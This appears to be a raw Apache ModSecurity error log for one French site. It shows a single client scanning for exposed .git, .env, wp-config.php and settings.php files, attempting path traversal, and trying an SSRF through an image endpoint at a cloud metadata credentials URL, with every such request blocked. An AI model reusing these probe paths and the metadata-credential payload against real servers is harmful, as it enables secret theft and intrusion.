[Mon May 11 13:22:37.719039 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.157:56852] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/HEAD"] [unique_id "agG7_VchVQ3tCn0m9OovZQAAARI"]
[Mon May 11 13:22:37.719248 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.157:56852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/HEAD"] [unique_id "agG7_VchVQ3tCn0m9OovZQAAARI"]
[Mon May 11 13:22:37.719482 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.157:57024] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/refs/heads/master"] [unique_id "agG7_eSQ-m-m0ukSShtZ8gAAAVg"]
[Mon May 11 13:22:37.719647 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.157:57024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/refs/heads/master"] [unique_id "agG7_eSQ-m-m0ukSShtZ8gAAAVg"]
[Mon May 11 13:22:37.722374 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.157:56876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/_next/image"] [unique_id "agG7_eJEyNRN152ArORhygAAAEc"]
[Mon May 11 13:22:39.487131 2026] [core:error] [pid 1319998:tid 1320008] [client 20.151.0.198:61211] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:39.487189 2026] [core:error] [pid 1319998:tid 1320008] [client 20.151.0.198:61211] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:40.186629 2026] [security2:error] [pid 1319998:tid 1320007] [client 195.178.110.157:57048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.development"] [unique_id "agG8AKt2WtvoFr7xvGysXQAAAIc"]
[Mon May 11 13:22:40.186832 2026] [security2:error] [pid 1319998:tid 1320007] [client 195.178.110.157:57048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.development"] [unique_id "agG8AKt2WtvoFr7xvGysXQAAAIc"]
[Mon May 11 13:22:40.191314 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.157:57040] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/logs/HEAD"] [unique_id "agG8AFchVQ3tCn0m9OovagAAAQ4"]
[Mon May 11 13:22:40.191481 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.157:57040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/logs/HEAD"] [unique_id "agG8AFchVQ3tCn0m9OovagAAAQ4"]
[Mon May 11 13:22:40.980488 2026] [core:error] [pid 1319886:tid 1319937] [client 20.151.0.198:14448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:40.980518 2026] [core:error] [pid 1319886:tid 1319937] [client 20.151.0.198:14448] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:41.543398 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.157:57146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agG8AeJEyNRN152ArORh0gAAAEA"]
[Mon May 11 13:22:41.543599 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.157:57146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agG8AeJEyNRN152ArORh0gAAAEA"]
[Mon May 11 13:22:41.544670 2026] [security2:error] [pid 1319953:tid 1319976] [client 195.178.110.157:57090] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/sites/default/settings.php"] [unique_id "agG8AeSQ-m-m0ukSShtZ-gAAAVU"]
[Mon May 11 13:22:41.544809 2026] [security2:error] [pid 1319953:tid 1319976] [client 195.178.110.157:57090] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/sites/default/settings.php"] [unique_id "agG8AeSQ-m-m0ukSShtZ-gAAAVU"]
[Mon May 11 13:22:41.646288 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.157:57168] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agG8Aay-5-wpj6Sx56ZwiQAAABY"]
[Mon May 11 13:22:41.646444 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.157:57168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/config"] [unique_id "agG8Aay-5-wpj6Sx56ZwiQAAABY"]
[Mon May 11 13:22:41.650060 2026] [security2:error] [pid 1319886:tid 1319914] [client 195.178.110.157:57062] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/config/.env"] [unique_id "agG8Aay-5-wpj6Sx56ZwigAAAAo"]
[Mon May 11 13:22:41.650250 2026] [security2:error] [pid 1319886:tid 1319914] [client 195.178.110.157:57062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/config/.env"] [unique_id "agG8Aay-5-wpj6Sx56ZwigAAAAo"]
[Mon May 11 13:22:41.653984 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.157:57080] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.git/index"] [unique_id "agG8Aat2WtvoFr7xvGysYgAAAIA"]
[Mon May 11 13:22:41.654142 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.157:57080] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.git/index"] [unique_id "agG8Aat2WtvoFr7xvGysYgAAAIA"]
[Mon May 11 13:22:41.657850 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.157:57116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/local/.env"] [unique_id "agG8AeJEyNRN152ArORh1QAAAFQ"]
[Mon May 11 13:22:41.657994 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.157:57116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/local/.env"] [unique_id "agG8AeJEyNRN152ArORh1QAAAFQ"]
[Mon May 11 13:22:41.680721 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.157:57076] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/wp-config.php"] [unique_id "agG8Aay-5-wpj6Sx56ZwiwAAAAI"]
[Mon May 11 13:22:41.680945 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.157:57076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/wp-config.php"] [unique_id "agG8Aay-5-wpj6Sx56ZwiwAAAAI"]
[Mon May 11 13:22:41.774023 2026] [core:error] [pid 1319953:tid 1319972] [client 195.178.110.157:57170] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 13:22:41.777613 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.157:57094] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8AeSQ-m-m0ukSShtZ_AAAAU8"]
[Mon May 11 13:22:41.777824 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.157:57094] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8AeSQ-m-m0ukSShtZ_AAAAU8"]
[Mon May 11 13:22:41.798473 2026] [security2:error] [pid 1319885:tid 1319935] [client 195.178.110.157:57112] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/storage/.env"] [unique_id "agG8AVchVQ3tCn0m9OovbAAAARc"]
[Mon May 11 13:22:41.798771 2026] [security2:error] [pid 1319885:tid 1319935] [client 195.178.110.157:57112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/storage/.env"] [unique_id "agG8AVchVQ3tCn0m9OovbAAAARc"]
[Mon May 11 13:22:44.387455 2026] [core:error] [pid 1319953:tid 1319960] [client 20.151.0.198:61229] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:44.387488 2026] [core:error] [pid 1319953:tid 1319960] [client 20.151.0.198:61229] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:46.525444 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.157:30988] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ventes-privees-auto.fr"] [uri "/_next/image/"] [unique_id "agG8BlchVQ3tCn0m9OoveQAAARM"]
[Mon May 11 13:22:46.526169 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.157:30988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/_next/image/"] [unique_id "agG8BlchVQ3tCn0m9OoveQAAARM"]
[Mon May 11 13:22:47.429383 2026] [core:error] [pid 1320674:tid 1320693] [client 20.151.0.198:56865] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:47.429427 2026] [core:error] [pid 1320674:tid 1320693] [client 20.151.0.198:56865] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:49.056511 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.157:31002] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env.local"] [unique_id "agG8Cat2WtvoFr7xvGysdQAAAJM"]
[Mon May 11 13:22:49.056684 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.157:31002] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env.local"] [unique_id "agG8Cat2WtvoFr7xvGysdQAAAJM"]
[Mon May 11 13:22:52.040786 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.157:31030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agG8DFchVQ3tCn0m9OovhwAAAQM"]
[Mon May 11 13:22:52.041048 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.157:31030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/.env"] [unique_id "agG8DFchVQ3tCn0m9OovhwAAAQM"]
[Mon May 11 13:22:55.377404 2026] [core:error] [pid 1319953:tid 1319964] [client 20.151.0.198:15076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:55.377430 2026] [core:error] [pid 1319953:tid 1319964] [client 20.151.0.198:15076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:22:56.576063 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.157:17198] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8EOSQ-m-m0ukSShtaGQAAAVA"]
